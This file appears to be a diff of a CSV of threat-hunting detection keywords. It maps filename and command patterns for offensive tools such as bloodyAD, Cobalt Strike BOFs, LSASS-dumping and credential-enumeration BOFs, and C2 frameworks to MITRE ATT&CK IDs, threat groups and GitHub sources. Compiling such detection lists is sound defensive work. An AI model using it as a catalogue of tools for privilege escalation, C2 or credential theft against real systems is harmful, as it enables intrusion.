+"*bloodyAD -*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","0","N/A","10","9","883","96","2023-10-04T14:38:56Z","2021-10-11T15:07:26Z"
+"*bloodyAD.py*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","9","883","96","2023-10-04T14:38:56Z","2021-10-11T15:07:26Z"
+"*bloodyAD-main*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege 
Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","9","883","96","2023-10-04T14:38:56Z","2021-10-11T15:07:26Z"
+"*bluekeepscanner.exe*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A",,"N/A",,,
+"*bm90cmVkYW1lY2hlYXRzdG93aW4-*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"*bniikohfmajhdcffljgfeiklcbgffppl*","greyware_tool_keyword","Upnet","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*bnijmipndnicefcdbhgcjoognndbgkep*","greyware_tool_keyword","Veee","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data 
Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*bob@moozle.wtf*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z"
+"*BOF prototype works!*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","0","N/A","10","10","152","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z"
+"*bof*/CredEnum/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike 
Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z"
+"*BOF.NET.git*","offensive_tool_keyword","BOF.NET","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt 
Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z"
+"*BOF.NET-main*","offensive_tool_keyword","BOF.NET","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z"
+"*BOF/*procdump/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z"
+"*bof_allocator*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*bof_helper.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) Creation Helper","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dtmsecurity/bof_helper","1","1","N/A","10","10","198","44","2022-05-03T18:56:14Z","2020-07-01T14:50:29Z"
+"*bof_net_user.c*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z"
+"*bof_net_user.o*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z"
+"*bof_pack.py *","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral 
Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,,
+"*bof_reuse_memory*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*BOF2shellcode*","offensive_tool_keyword","cobaltstrike","POC tool to convert CobaltStrike BOF files to raw shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FalconForceTeam/BOF2shellcode","1","1","N/A","10","10","145","25","2021-11-05T18:37:53Z","2021-11-05T14:29:57Z"
+"*bof2shellcode.py*","offensive_tool_keyword","cobaltstrike","POC tool to convert CobaltStrike BOF files to raw shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FalconForceTeam/BOF2shellcode","1","1","N/A","10","10","145","25","2021-11-05T18:37:53Z","2021-11-05T14:29:57Z"
+"*BOF-DLL-Inject*","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object 
Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","10","10","140","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z"
+"*bofentry::bof_entry*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z"
+"*BOF-ForeignLsass*","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","10","10","96","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z"
+"*bofhound --*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z"
+"*bofhound -i 
*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z"
+"*bofhound -o *","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z"
+"*bofhound-main*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z"
+"*BOF-IShellWindows-DCOM.*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt 
Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z"
+"*BofLdapSignCheck*","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","148","22","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z"
+"*bofloader.bin*","offensive_tool_keyword","cobaltstrike","POC tool to convert CobaltStrike BOF files to raw shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 
